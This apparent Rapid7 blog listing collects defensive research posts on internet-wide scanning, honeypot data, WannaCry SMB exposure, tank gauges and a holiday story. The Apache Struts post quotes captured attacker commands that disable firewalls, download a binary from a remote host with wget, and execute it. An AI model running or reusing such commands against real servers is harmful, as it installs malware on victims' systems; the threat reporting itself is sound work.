Rapid7 Blog

Labs  

Data Mining the Undiscovered Country

Using Internet-scale Research Data to Quantify and Reduce Exposure It’s been a busy 2017 at Rapid7 Labs. Internet calamity struck swift and often, keeping us all on our toes and giving us a chance to fully test out the capabilities of our internet-scale research…

Using Internet-scale Research Data to Quantify and Reduce Exposure It’s been a busy 2017 at Rapid7 Labs. Internet calamity struck swift and often, keeping us all on our toes and giving us a chance to fully test out the capabilities of our internet-scale research platform. Let’s take a look at how two key components of Rapid7 Labs’ research platform—Project Heisenberg and Heisenberg Cloud—came together to enumerate and reduce exposure the past two quarters. (If reading isn't your thing, we'll cover this in person at today's UNITED talk.) Project Sonar Refresher Back in “the day” the internet really didn’t need an internet telemetry tool like Rapid7's Project Sonar. This: was the extent of what would eventually become the internet and it literally had a printed directory that held all the info about all the hosts and users: Fast-forward to Q1 2017 where Project Sonar helped identify a few hundred million hosts exposing one or more of 30 common TCP & UDP ports: Project Sonar is an internet reconnaissance platform. We scan the entire public IPv4 address range (except for those in our opt-out list) looking for targets, then do protocol-level decomposition scans to try to get an overall idea of “exposure” of many different protocols, including: In 2016, we began a re-evaluation and re-engineering project of Project Sonar that greatly increased the speed and capabilities of our core research gathering engine. In fact, we now perform nearly 200 “studies” per-month collecting detailed information about the current state of IPv4 hosts on the internet. (Our efforts are not random, and there’s more to a scan than just a quick port hit; there’s often quite a bit of post-processing engineering for new scans, so we don’t just call them “scans.”) Sonar has been featured in over 20 academic papers (see for yourself!) and is a core part of the foundation for many popular talks at security conferences (including 3 at BH/DC in 2017). We share all our scan data through a research partnership with the University of Michigan — https://scans.io. Keep reading to see how you can use this data on your own to help improve the security posture in your organization. Cloudy With A Chance Of Honeypots Project Sonar enables us to actively probe the internet for data, but this provides only half the data needed to understand what’s going on. Heisenberg Cloud is a sensor network of honeypots developed by Rapid7 that are hosted in every region of every major cloud provider (the following figure is an example of Heisenberg global coverage from three of the providers). Heisenberg agents can run multiple types and flavors of honeypots. From simple tripwires that enable us to enumerate activity: to more stealthy ones that are designed to blend in by mimicking real protocols and servers: All of these honeypot agents are managed through traditional, open source cloud management tools. We collect all agent-level log data using Rapid7's InsightOps tool and collect all honeypot data—including raw PCAPs—centrally on Amazon S3. We have Hesienberg nodes appearing to be everything from internet cameras to MongoDB servers and everything in between. But, we’re not just looking for malicious activity. Heisenberg also enables us to see cloud and internet service “misconfigurations”—i.e., legit, benign traffic that is being sent to a node that is no longer under the control of the sending organization but likely was at some point. We see database queries, API calls, authenticated sessions and more and this provides insight into how well organizations are (or aren’t) configuring and maintaining their internet presence. Putting It All Together We convert all our data into a column-storage format called “parquet” that enables us to use a wide array of large-scale data analysis platforms to mine the traffic. With it, we can cross-reference Sonar and Heisenberg data—along with data from feeds of malicious activity or even, say, current lists of digital coin mining bots—to get a pretty decent picture of what’s going on. This past year (to date), we’ve publicly used our platform to do everything from monitoring Mirai (et al) botnet activity to identifying and quantifying (many) vulnerable services to tracking general protocol activity and exposure before and after the Shadow Brokers releases. Privately, we’ve used the platform to develop custom feeds for our Insight platform that helps users identify, quantify and reduce exposure. Let’s look into a few especially fun and helpful cases we’ve studied: Sending Out An S.O.S. Long-time readers of the Rapid7 blog may remember a post we did on protestors hijacking internet-enabled devices that broadcasters use to get signals to radio towers. We found quite a bit of open and unprotected devices: What we didn’t tell you is that Rapid7’s Rebekah Brown worked with the National Association of Broadcasters to get the word out to vulnerable stations. Within 24 hours the scope of the issue was reduced by 50% and now only a handful (~15%) remain open and unprotected. This is an incredible “win” for the internet as exposure reduction like this is rarely seen. We used our Sonar HTTP study to look for candidate systems and then performed a targeted scan to see if each device was — in fact — vulnerable. Thanks to the aforementioned re-engineering efforts, these subsequent scans take between 30 minutes to three hours (depending on the number of targets and complexity of the protocol decomposition). That means, when we are made aware of a potential internet-wide issue, we can get active, current telemetry to help quantify the exposure and begin working with CERTs and other organizations to help reduce risk. Internet of Exposure It’d be too easy to talk about the Mirai botnet or stunt-hacking images from open cameras. Let’s revisit the exposure of a core component of our nation’s commercial backbone: petroleum. Specifically, the gas we all use to get around. We’ve talked about it before and it’s hard to believe (or perhaps not, in this day and age) such a clunky device... ...can be so exposed. We’ve shown you we can count these IoThings but we’ve taken the ATG monitoring a step further to show how careless configurations could possibly lead to exposure of important commercial information. Want to know the median number of gas tanks at any given petrol station? We’ve got an app for that: Most stations have 3-4 tanks, but some have many more. This can be sliced-and-diced by street, town, county and even country since the vast majority of devices provide this information with the tank counts. How about how much inventory currently exists across the stations? We won’t go into the economic or malicious uses of this particular data, but you can likely ponder that on your own. Despite previous attempts by researchers to identify this exposure—with the hopeful intent of raising enough awareness to get it resolved—we continue to poke at this and engage when we can to help reduce this type of exposure. Think back on this whenever your organization decides to deploy an IoT sensor network and doesn’t properly risk-assess the exposure depending on the deployment model and what information is being presented through the interface. But, these aren’t the only exposed things. We did an analysis of our Port 80 HTTP GET scans to try to identify IoT-ish devices sitting on that port and it’s a mess: You can explore all the items we found here but one worth calling out is: These are 251 buildings—yes, buildings—with their entire building management interface directly exposed to the internet, many without authentication and not even trying to be “sneaky” and use a different port than port 80. It’s vital that you scan your own perimeter for this type of exposure (not just building management systems, of course) since it’s far too easy to have something slip on to the internet than one would expect. Wiping Away The Tears Rapid7 was quick to bring hype-free information and help for the WannaCry “digital hurricane” this past year. We’ve migrated our WannaCry efforts over to focused reconnaissance of related internet activity post-Shadow Brokers releases. Since WannaCry, we’ve seen a major uptick in researchers and malicious users looking for SMB hosts (we’ve seen more than that but you can read our 2017 Q2 Threat Report for more details). As we work to understand what attackers are doing, we are developing different types of honeypots to enable us to analyze—and, perhaps even predict—their intentions. We’ve done even more than this, but hopefully you get an idea of the depth and breadth of analyses that our research platform enables. Take Our Data...Please! We provide some great views of our data via our blog and in many reports: But, YOU can make use of our data to help your organization today. Sure, Sonar data is available via Metasploit (Pro) via the Sonar C, but you can do something as simple as: $ curl -o smb.csv.gz\ https://scans.io/data/rapid7/sonar.tcp/2017-08-16-1502859601-tcp_smb_445.csv.gz $ gzcat smb.csv.gz | cut -d, -f4,4 | grep MY_COMPANY_IP_ADDRESSES to see if you’re in one of the study results. Some ones you really don’t want to show up in include SMB, RDP, Docker, MySQL, MS SQL, MongoDB. If you’re there, it’s time to triage your perimeter and work on improving deployment practices. You can also use other Rapid7 open source tools (like dap) and tools we contribute to (such as the ZMap ecosystem) to enrich the data and get a better picture of exposure, focusing specifically on your organization and threats to you. Fin We’ve got more in store for the rest of the year, so keep an eye (or RSS feed slurper) on the Rapid7 blog as we provide more information on exposure. You can get more information on our studies and suggest new ones via research@rapid7.com.

National Exposure Index 2017

Today, Rapid7 is releasing the second National Exposure Index, our effort to quantify the exposure that nations are taking on by offering public services on the internet—not just the webservers (like the one hosting this blog), but also unencrypted POP3, IMAPv4, telnet, database servers,…

Today, Rapid7 is releasing the second National Exposure Index, our effort to quantify the exposure that nations are taking on by offering public services on the internet—not just the webservers (like the one hosting this blog), but also unencrypted POP3, IMAPv4, telnet, database servers, SMB, and all the rest. By mapping the virtual space of the internet to the physical space where the machines hosting these services reside, we can provide greater understanding of each nation's internet exposure to both active attack and passive monitoring. Even better, we can point to specific regions of the world where we can make real progress on reducing overall risk to critical internet-connected infrastructure. Measuring Exposure When we first embarked on this project in 2016, we set out to answer some fundamental questions about the composition of the myriad services being offered on the internet. While everyone knows that good old HTTP dominates internet traffic, we knew that there are plenty of other services being offered that have no business being on the modern internet. Telnet, for example, is a decades-old remote administration service that offers nothing in the way of encryption and is often configured with default settings, a fact exploited by the devastating Mirai botnet attacks of last October. But, as security professionals and network engineers, we couldn't say just how many telnet servers were out there. So we counted them. Doing Something About It We know today that there are about 10 million apparent telnet servers on the internet, but that fact alone doesn't do us a lot of good. Sure, it's down 5 million from last year—a 33% drop that can be attributed almost entirely to the Mirai attacks—but this was the result of a disaster that caused significant disruption, not a planned phase-out of an old protocol. So, instead of just reporting that there are millions of exposed, insecure services on the global internet, we can point to specific countries where these services reside. This is far more useful, since it helps the technical leadership in those specific countries get a handle on what their exposure is so they can do something about it. By releasing the National Exposure Index on an annual basis, we hope to track the evolving internet, encourage the wide-scale deployment of more modern, secure, appropriate services, and enable those people in positions of regional authority to better understand their existing, legacy exposure. Mapping Exposure We're pretty pleased with how the report turned out, and encourage you to get a hold of it here. We have also created an interactive, global map so you can cut to the statistics that are most important for you and your region. In addition, we're releasing the data that backs the report—which we gathered using Rapid7's Project Sonar—in case you're the sort who wants to do your own investigation. Scanning the entire internet takes a fair amount of effort, and we want to encourage a more open dialogue about the data we've gathered. You're welcome to head on over to scans.io and pick up our raw scanning data, as well as our GitHub repo of the summary data that went into our analysis. If you'd like to collaborate on cutting this data in new and interesting ways, feel free to drop us a line and we'll be happy to nerd out on all things National Exposure with you.

WannaCry Update: Vulnerable SMB Shares Are Widely Deployed And People Are Scanning For Them

WannaCry Overview Last week the WannaCry ransomware worm, also known as Wanna Decryptor, Wanna Decryptor 2.0, WNCRY, and WannaCrypt started spreading around the world, holding computers for ransom at hospitals, government offices, and businesses. To recap: WannaCry exploits a vulnerability in the Windows Server…

WannaCry Overview Last week the WannaCry ransomware worm, also known as Wanna Decryptor, Wanna Decryptor 2.0, WNCRY, and WannaCrypt started spreading around the world, holding computers for ransom at hospitals, government offices, and businesses. To recap: WannaCry exploits a vulnerability in the Windows Server Message Block (SMB) file sharing protocol. It spreads to unpatched devices directly connected to the internet and, once inside an organization, those machines and devices behind the firewall as well. For full details, check out the blog post: Wanna Decryptor (WannaCry) Ransomware Explained. Since last Friday morning (May 12), there have been several other interesting posts about WannaCry from around the security community. Microsoft provided specific guidance to customers on protecting themselves from WannaCry. MalwareTech wrote about how registering a specific domain name triggered a kill switch in the malware, stopping it from spreading. Recorded Future provided a very detailed analysis of the malware's code. However, the majority of reporting about WannaCry in the general news has been that while MalwareTech's domain registration has helped slow the spread of WannaCry, a new version that avoids that kill switch will be released soon (or is already here) and that this massive cyberattack will continue unabated as people return to work this week. In order to understand these claims and monitor what has been happening with WannaCry, we have used data collected by Project Sonar and Project Heisenberg to measure the population of SMB hosts directly connected to the internet, and to learn about how devices are scanning for SMB hosts. Part 1: In which Rapid7 uses Sonar to measure the internet Project Sonar regularly scans the internet on a variety of TCP and UDP ports; the data collected by those scans is available for you to download and analyze at scans.io. WannaCry exploits a vulnerability in devices running Windows with SMB enabled, which typically listens on port 445. Using our most recent Sonar scan data for port 445 and the recog fingerprinting system, we have been able to measure the deployment of SMB servers on the internet, differentiating between those running Samba (the Linux implementation of the SMB protocol) and actual Windows devices running vulnerable versions of SMB. We find that there are over 1 million internet-connected devices that expose SMB on port 445. Of those, over 800,000 run Windows, and — given that these are nodes running on the internet exposing SMB — it is likely that a large percentage of these are vulnerable versions of Windows with SMBv1 still enabled (other researchers estimate up to 30% of these systems are confirmed vulnerable, but that number could be higher). We can look at the geographic distribution of these hosts using the following treemap (ISO3C labels provided where legible): The United States, Asia, and Europe have large pockets of Windows systems directly exposed to the internet while others have managed to be less exposed (even when compared to their overall IPv4 blocks allocation). We can also look at the various versions of Windows on these hosts: The vast majority of these are server-based Windows operating systems, but there is also a further unhealthy mix of Windows desktop operating systems in the mix—, some quite old. The operating system version levels also run the gamut of the Windows release history timeline: <span Using Sonar, we can get a sense for what is out there on the internet offering SMB services. Some of these devices are researchers running honeypots (like us), and some of these devices are other research tools, but a vast majority represent actual devices configured to run SMB on the public internet. We can see them with our light-touch Sonar scanning, and other researchers with more invasive scanning techniques have been able to positively identify that infection rates are hovering around 2%. Part 2: In which Rapid7 uses Heisenberg to listen to the internet While Project Sonar scans the internet to learn about what is out there, Project Heisenberg is almost the inverse: it listens to the internet to learn about scanning activity. Since SMB typically runs on port 445, and the WannaCry malware scans port 445 for potential targets, if we look at incoming connection attempts on port 445 to Heisenberg nodes as shown in Figure 4, we can see that scanning activity spiked briefly on 2017-05-10 and 2017-05-11, then increased quite a bit on 2017-05-12, and has stayed at elevated levels since. Not all traffic to Heisenberg on port 445 is an attempt to exploit the SMB vulnerability that WannaCry targets (MS17-010). There is always scanning traffic on port 445 (just look at the activity from 2017-05-01 through 2017-05-09), but a majority of the traffic captured between 2017-05-12 and 2017-05-14 was attempting to exploit MS17-010 and likely came from devices infected with the WannaCry malware. To determine this we matched the raw packets captured by Heisenberg on port 445 against sample packets known to exploit MS17-010. Figure 5 shows the number of unique IP addresses scanning for port 445, grouped by hour between 2017-05-10 and 2017-05-16. The black line shows that at the same time that the number of incoming connections increases (2017-05-12 through 2017-05-14), the number of unique IPs addresses scanning for port 445 also increases. Furthermore, the orange line shows the number of new, never- before- seen IPs scanning for port 445. From this we can see that a majority of the IPs scanning for port 445 between 2017-05-12 and 2017-05-14 were new scanners. Finally, we see scanning activity from 157 different countries in the month of May, and scanning activity from 133 countries between 2017-05-12 and 2017-05-14. Figure 6 shows the top 20 countries from which we have seen scanning activity, ordered by the number of unique IPs from those countries. While we have seen the volume of scans on port 445 increase compared to historical levels, it appears that the surge in scanning activity seen between 2017-05-12 and 2017-05-14 has started to tail off. So what? Using data collected by Project Sonar we have been able to measure the deployment of vulnerable devices across the internet, and we can see that there are many of them out there. Using data collected by project Heisenberg, we have seen that while scanning for devices that expose port 445 has been observed for quite some time, the volume of scans on port 445 has increased since 2017-05-12, and a majority of those scans are specifically looking to exploit MS17-010, the SMB vulnerability that the WannaCry malware looks to exploit. MS17-010 will continue to be a vector used by attackers, whether from the WannaCry malware or from something else. Please, follow Microsoft's advice and patch your systems. If you are a Rapid7 InsightVM or Nexpose customer, or you are running a free 30 day trial, here is a step by step guide on on how you can scan your network to find all of your assets that are potentially at risk for your organization. Coming Soon If this sort of information about internet wide measurements and analysis is interesting to you, stay tuned for the National Exposure Index 2017. Last year, we used Sonar scans to evaluate the security exposure of all the countries of the world based on the services they exposed on the internet. This year, we have run our studies again, we have improved our methodology and infrastructure, and we have new findings to share. Related: Find all of our WannaCry related resources here [Blog] Using Threat Intelligence to Mitigate Wanna Decryptor (WannaCry)

Project Sonar - Mo' Data, Mo' Research

Since its inception, Rapid7's Project Sonar has aimed to share the data and knowledge we've gained from our Internet scanning and collection activities with the larger information security community.  Over the years this has resulted in vulnerability disclosures, research papers, conference presentations, community collaboration…

Since its inception, Rapid7's Project Sonar has aimed to share the data and knowledge we've gained from our Internet scanning and collection activities with the larger information security community.  Over the years this has resulted in vulnerability disclosures, research papers, conference presentations, community collaboration and data.  Lots and lots of data.Thanks to our friends at scans.io, Censys, and the University of Michigan, we've been able to provide the general public free access to much of our data, including:4 years of bi-weekly HTTP GET / studies. Over 6T of data. https://scans.io/study/sonar.http~1 year of bi-weekly HTTPS GET / studies. Over 2T of data. https://scans.io/study/sonar.https3 years and nearly 1000 ~monthly studies of common UDP services. Over 100G of juicy data.  https://scans.io/study/sonar.udp4 years, nearly 300G and 1500 bi-weekly studies of the SSL certificates obtained by examining commonly exposed SSL services.  https://scans.io/study/sonar.ssl and https://scans.io/study/sonar.moressl3 years and hundreds of ~weekly forward DNS (FDNS) and reverse DNS (RDNS) studies. Nearly 2T of data.  https://scans.io/study/sonar.fdns, https://scans.io/study/sonar.fdns_v2, https://scans.io/study/sonar.rdns, and https://scans.io/study/sonar.rdns_v2New!  zmap SYN scan results for any Sonar TCP study.  A little data now, but a lot over time.  https://scans.io/study/sonar.tcpAs project Sonar continues, we will continue to publish our data through the outlets listed above, perhaps in addition to others.Are you interested in Project Sonar?  Are you using this data?  If so, how?  Interested in seeing additional studies performed?  Have questions about the existing studies or how to use or interpret the data?  We love hearing from the community!  Post a comment below or reach out to us at research [at] rapid7 [dot] com.

Apache Struts Vulnerability (CVE-2017-5638) Exploit Traffic

UPDATE - March 10th, 2017: Rapid7 added a check that works in conjunction with Nexpose's web spider functionality. This check will be performed against any URIs discovered with the suffix “.action” (the default configuration for Apache Struts apps). To learn more about using…

UPDATE - March 10th, 2017: Rapid7 added a check that works in conjunction with Nexpose's web spider functionality. This check will be performed against any URIs discovered with the suffix “.action” (the default configuration for Apache Struts apps). To learn more about using this check, read this post.UPDATE - March 9th, 2017:  Scan your network for this vulnerability with check id apache-struts-cve-2017-5638, which was added to Nexpose in content update 437200607.Attacks spotted in the wildYesterday, Cisco Talos published a blog post indicating that they had observed in-the-wild attacks against a recently announced vulnerability in Apache Struts. The vulnerability, CVE-2017-5638, permits unauthenticated Remote Code Execution (RCE) via a specially crafted Content-Type value in an HTTP request. An attacker can create an invalid value for Content-Type which will cause vulnerable software to throw an exception.  When the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed.World Wide Window into the WebFor some time now Rapid7 has been running a research effort called Heisenberg Cloud. The project consists of honeypots spread across every region of five major cloud providers, as well as a handful of collectors in private networks. We use these honeypots to provide visibility into the activities of attackers so that we can better protect our customers as well as provide meaningful information to the public in general. Today, Heisenberg Cloud helped provide information about the scope and scale of the attacks on the Apache vulnerability. If in the coming days and weeks it will provide information about the evolution and lifecycle of the attacks.A few words of caution before I continue: please keep in mind that the accuracy of IP physical location here is at the mercy of geolocation databases and it's difficult to tell who the current 0wner(s) of a host are at any given time. Also, we host our honeypots in cloud providers in order to provide broad samples. We are unlikely to see targeted or other scope-limited attacks.Spreading malwareWe use Logentries to query our Heisenberg data and extract meaningful information.  One of the aspects of the attacks is how the malicious traffic has changed over the recent days.  The graph below shows a 72 hour window in time.The first malicious requests we saw were a pair on Tuesday, March 7th at 15:36 UTC that originated from a host in Zhengzhou, China. Both were HTTP GET requests for /index.aciton (misspelled) and the commands that they executed would have caused a vulnerable target to download binaries from the attacking server. Here is an example of the commands that were sent as a single string in the Content-Type value:cd /dev/shm; wget http://XXX.XXX.XXX.92:92/lmydess; chmod 777 lmydess; ./lmydess; I've broken the command into lines to make it easier to read. It's pretty standard for a command injection or remote code execution attack against web servers. Basically, move to some place writeable, download code, make sure its executable, and run it.After this, the malicious traffic seemed to stop until Wednesday, March 8th at 09:02 UTC when a host in Shanghai, China started sending attacks. The requests differed from the previous attacks. The new attacks were HTTP POSTs to a couple different paths and attempted to execute different commands on the victim:/etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd /tmp; wget -c http://XXX.XXX.XXX.26:9/7; chmod 777 7; ./7; This is similar to the prior commands but this attacker tries to stop the firewall first. The requested binary was not hosted on the same IP address that attacked the honeypot. In this case the server hosting the binary was still alive and we were able to capture a sample.  It appears to be a variant of the XOR DDoS family.Not so innocentMuch like Talos, in addition to the attempts to spread malware, we see some exploitation of the vulnerability to run "harmless" commands such as whois, ifconfig, and a couple variations that echoed a value. The word harmless is in quotes because though the commands weren't destructive they could have allowed the originator of the request to determine if the target was vulnerable. They may be part of a research effort to understand the number of vulnerable hosts on the public Internet or an information gathering effort as part of preparation for a later attack. Irrespective of the reason, network and system owners should review their environments.A little sunshineBased on the traffic we are seeing at this time it would appear that the bulk of the non-targeted malicious traffic appears to be limited attacks from a couple of sources. This could change significantly tomorrow if attackers determine that there is value in exploiting this vulnerability. If you are using Apache Struts this would be a great time to review Apache's documentation on the vulnerability and then survey your environment for vulnerable hosts. Remember that Apache products are often bundled with other software so you may have vulnerable hosts of which you are unaware. Expect Nexpose and Metasploit coverage to be available soon to help with detection and validation efforts. If you do have vulnerable implementations of the software in your environment, I would strongly recommend upgrading as soon as safely possible. If you cannot upgrade immediately, you may wish to investigate other mitigation efforts such as changing firewall rules or network equipment ACLs to reduce risk. As always, it's best to avoid exposing services to public networks if at all possible.Good luck!

12 Days of HaXmas: A HaxMas Carol

(A Story by Rapid7 Labs) Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the…

(A Story by Rapid7 Labs) Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Happy Holi-data from Rapid7 Labs! It's been a big year for the Rapid7 elves Labs team. Our nigh 200-node strong Heisenberg Cloud honeypot network has enabled us to bring posts & reports such as The Attacker's Dictionary, Cross-Cloud Adversary Analytics and Mirai botnet tracking to the community, while Project Sonar fueled deep dives into National Exposure as well as ClamAV, fuel tanks and tasty, tasty EXTRABACON. Our final gift of the year is the greatest gift of all: DATA! We've sanitized an extract of our November, 2016 cowrie honeypot data from Heisenberg Cloud. While not the complete data set, it should be good for hours of fun over the holiday break. You can e-mail research [at] rapid7 [dot] com if you have any questions or leave a note here in the comments. While you're waiting for that to download, please enjoy our little Haxmas tale… Once upon a Haxmas eve… CISO Scrooge sat sullen in his office. His demeanor was sour as he reviewed the day's news reports and sifted through his inbox, but his study was soon interrupted by a cheery minion's “Merry HaXmas, CISO!”. CISO Scrooge replied, “Bah! Humbug!” The minion was taken aback. “HaXmas a humbug, CISO?! You surely don't mean it!” “I do, indeed…” grumbled Scrooge. “What is there to be merry about? Every day attackers are compromising sites, stealing credentials and bypassing defenses. It's almost impossible to keep up. What's more, the business units and app teams here don't seem to care a bit about security. So, I say it again ‘Merry HaXmas?' - HUMBUG!” Scrooge's minion knew better than argue and quickly fled to the comforting glow of the pew-pew maps in the security operations center. As CISO Scrooge returned to his RSS feeds his office lights dimmed and a message popped up on his laptop, accompanied by a disturbing “clank” noise (very disturbing indeed since he had the volume completely muted). No matter how many times he dismissed the popup it returned, clanking all the louder. He finally relented and read the message: “Scrooge, it is required of every CISO that the defender spirit within them should stand firm with resolve in the face of their adversaries. Your spirit is weary and your minions are discouraged. If this continues, all your security plans will be for naught and attackers will run rampant through your defenses. All will be lost.” Scrooge barely finished uttering, “Hrmph. Nothing but a resourceful security vendor with a crafty marketing message. My ad blocker must be misconfigured and that bulb must have burned out.” “I AM NO MISCONFIGURATION!” appeared in the message stream, followed by, “Today, you will be visited by three cyber-spirits. Expect their arrivals on the top of each hour. This is your only chance to escape your fate.” Then, the popup disappeared and the office lighting returned to normal. Scrooge went back to his briefing and tried to put the whole thing out of his mind. The Ghost of HaXmas Past CISO Scrooge had long finished sifting through news and had moved on to reviewing the first draft of their PCI DSS ROC[i]. His eyes grew heavy as he combed through the tome until he was startled with a bright green light and the appearance of a slender man in a tan plaid 1970's business suit holding an IBM 3270 keyboard. “Are you the cyber-spirit, sir, whose coming was foretold to me?”, asked Scrooge. “I am!”, replied the spirit. “I am the Ghost of Haxmas Past! Come, walk with me!” As Scrooge stood up they were seemingly transported to a room full of mainframe computers with workers staring drone-like into green-screen terminals. “Now, this was security, spirit!” exclaimed Scrooge. “No internet…No modems…Granular RACF[ii] access control…” (Scrooge was beaming almost as bright as the spirit!) “So you had been successful securing your data from attackers?”, asked the spirit. “Well, yes, but this is when we had control! We had the power to give or deny anyone access to critical resources with a mere series of arcane commands.” As soon as he said this, CISO Scrooge noticed the spirit moving away and motioning him to follow. When he caught up, the scene changed to cubicle-lined floor filled with desktop PCs. “What about now, were these systems secure?”, inquired the spirit. “Well, yes. It wasn't as easy as it was with the mainframe, but as our business tools changed and we started interacting with clients and suppliers on the internet we found solutions that helped us protect our systems and networks and give us visibility into the new attacks that were emerging.”, remarked CISO Scrooge. “It wasn't easy. In fact, it was much harder than the mainframe, but the business was thriving: growing, diversifying and moving into new markets. If we had stayed in a mainframe mindset we'd have gone out of business.” The spirit replied, “So, as the business evolved, so did the security challenges, but you had resources to protect your data?” “Well, yes. But, these were just PCs. No laptops or mobile phones. We still had control!”, noted Scrooge. “That may be,” noted the spirit, “but if we continued our journey, would this not be the pattern? Technology and business practices change, but there have always been solutions to security problems coming at the same pace?” CISO Scrooge had to admit that as he looked back in his mind, there had always been ways to identify and mitigate threats as they emerged. They may not have always been 100% successful, but the benefits of the “new” to the business were far more substantial than the possible issues that came with it. The Ghost of Haxmas Present As CISO Scrooge pondered the spirit's words he realized he was back at his desk, his screen having locked due to the required inactivity timeout.  He gruffed a bit (he couldn't understand the 15-minute timeout when at your desk as much as you can't) and fumbled 3 attempts at his overly-complex password to unlock the screen before he was logged back in. His PCI DSS ROC was minimized and his browser was on a MeTube video (despite the site being blocked on the proxy server). He knew he had no choice but to click “play”. As he did, it seemed to be a live video of the Mooncents coffee shop down the street buzzing with activity. He was seamlessly transported from remote viewer to being right in the shop, next to a young woman in bespoke, authentic, urban attire, sipping a double ristretto venti half-soy nonfat decaf organic chocolate brownie iced vanilla double-shot gingerbread frappuccino. Amongst the patrons were people on laptops, tablets and phones, many of them conducting business for CISO's company. “Dude. I am the spirit of Haxmas Present”, she said, softly, as her gaze fixated upon a shadowy figure in the corner. CISO Scrooge turned his own gaze in that direction and noticed a hoodie-clad figure with a sticker-laden laptop. Next to the laptop was a device that looked like a wireless access point and Scrooge could just barely hear the figure chuckling to himself as his fingers danced across the keyboard. “Is that person doing what I think he's doing?”, Scrooge asked the spirit. “Indeed,” she replied. “He's setup a fake Mooncents access point and is intercepting all the comms of everyone connected to it.” Scrooges' eyes got wide as he exclaimed “This is what I mean! These people are just like sheep being led to the shearer. They have no idea what's happening to them! It's too easy for attackers to do whatever they want!” As he paused for a breath, the spirit gestured to a woman who just sat down in the corner and opened her laptop, prompting Scrooge to go look at her screen. The woman did work at CISO's company and she was in Mooncents on her company device, but — much to the surprise of Scrooge — as soon as she entered her credentials, she immediately fired up the VPN Scrooge's team had setup, ensuring that her communications would not be spied upon. The woman never once left her laptop alone and seemed to be very aware of what she needed to do to stay as safe as possible. “Do you see what is happening?”, asked the spirit? “Where and how people work today are not as fixed as it was in the past. You have evolved your corporate defenses to the point that attackers need to go to lengths like this or trick users through phishing to get what they desire.” “Technology I can secure. But how do I secure people?!”, sighed Scrooge. “Did not this woman do what she needed to keep her and your company's data safe?”, asked the spirit. “Well, yes. But it's so much more work!”, noted Scrooge. “I can't install security on users, I have to make them aware of the threats and then make it as easy as possible for them to work securely no matter where they are!”[iii]</sup As soon as he said this, he realized that this was just the next stage in the evolution of the defenses he and his team had been putting into place. The business-growing power inherent in this new mobility and the solid capabilities of his existing defenses forced attackers to behave differently and he understood that he and his team probably needed to as well. The spirit gave a wry, ironic grin at seeing Scrooge's internal revelation. She handed him an infographic titled “Ignorance & Want” that showcased why it was important to make sure employees were well-informed and to also stay in tune with how users want to work and make sure his company's IT offerings were as easy-to-use and functional as all the shiny “cloud” apps. The Ghost of Haxmas Future As Scrooge took hold of the infographic the world around him changed. A dark dystopian scene faded into view. Buildings were in shambles and people were moving in zombie-like fashion in the streets. A third, cloaked spirit appeared next to him and pointed towards a disheveled figure hulking over a fire in a barrel. An “eyes” emoji appeared on the OLED screen where the spirit's face should have been. CISO Scrooge didn't even need to move closer to see that it was a future him struggling to keep warm to survive in this horrible wasteland. “Isn't this a bit much?”, inquired Scrooge. The spirit shrugged and a “whatever” emoji appeared on the screen. Scrooge continued, “I think I've got the message. Business processes will keep evolving and moving faster and will never be tethered and isolated again. I need to stay positive and constantly evolve — relying on psychology, education as well as technology — to address the new methods attackers will be adopting. If I don't, it's ‘game over'.” The spirit's screen flashed a “thumbs up” emoji and CISO Scrooge found himself back at his desk, infographic strangely still in hand with his Haxmas spirt fully renewed. He vowed to keep Haxmas all the year through from now on. [i] Payment Card Industry Data Security Standard Report on Compliance [ii] http://www-03.ibm.com/systems/z/os/zos/features/racf/ [iii] Scrooge eventually also realized he could make use of modern tools such as Insight IDR to combine security & threat event data with user behavior analysis to handle the cases where attackers do successfully breach users.

The Internet of Gas Station Tank Gauges -- Final Take?

In early 2015, HD Moore performed one of the first publicly accessible research related to Internet-connected gas station tank gauges, The Internet of Gas Station Tank Gauges. Later that same year, I did a follow-up study that probed a little deeper in The Internet of…

In early 2015, HD Moore performed one of the first publicly accessible research related to Internet-connected gas station tank gauges, The Internet of Gas Station Tank Gauges. Later that same year, I did a follow-up study that probed a little deeper in The Internet of Gas Station Tank Gauges — Take #2. As part of that study, we were attempting to see if the exposure of these devices changed in the ~10 months since our initial study as well as probe a little bit deeper to see if there were affected devices that we missed in the initial study due to the study's primitive inspection capabilities at the time. Somewhat unsurprisingly, the answer was no, things hadn't really changed, and even with the additional inspection capabilities we didn't see a wild swing that would be any cause for alarm. Recently, we decided to blow the dust off this study and re-run it for old-time's sake in the event that things had taken a wild swing in either direction or if other interesting patterns could be derived.  Again, we found very little changed. Not-ATGs and the Signal to Noise Ratio What is often overlooked in studies like this is the signal to noise ratio seen in the results, the "signal" being protocol responses you expect to see and the "noise" being responses that are a bit unexpected.  For example, finding SSH servers running on HTTP ports, typically TCP-only services being crudely crammed over UDP, and gobs of unknown, intriguing responses that will keep researchers busy chasing down explanations for years. These ATG studies were no exception. In most recent zmap TCP SYN scan done against port 10001 on November 3, 2016, we found nearly 3.4 million endpoints responding as open. Of those, we had difficulty sending our ATG-specific probes to over 2.8 million endpoints — some encountered socket level errors, others simply received no responses. It is likely that a large portion of these responses, or lack thereof, are due to devices such as tar-pits, IDS/IPS, etc. The majority of the remaining endpoints appear to be a smattering of HTTP, FTP, SSH and other common services run on odd ports for one reason or another.  And last but not least are a measly couple of thousand ATGs. I hope to explore the signal and noise related problems related to Internet Scanning in a future post. Future ATG Research and Scan Data We believe that is important to be transparent with as much of our research as possible.  Even if a particular research path we take ends up a dead, boring end, by publishing our process and what we did (or didn't) find might help a future wayward researcher who ends up in this particular neck of research navigate accordingly. With that said, this is likely to be our last post related to ATGs unless new research/ideas arise or interesting swings in results occur in future studies. Is there more to be done here?  Absolutely!  Possible areas for future research include: Are there additional commands that exposed ATGs might support that provide data that is worth researching, for security or otherwise? Are there other services exposed on these ATGs?  What are the security implications? Are there advancements to be made on the offensive or defensive side relating to ATGs and related technologies? We have published the raw zmap TCP scan results for all of the ATG studies we've done to date here.  We have also started conducting these studies on a monthly basis and these runs will automatically upload to scans.io when complete. 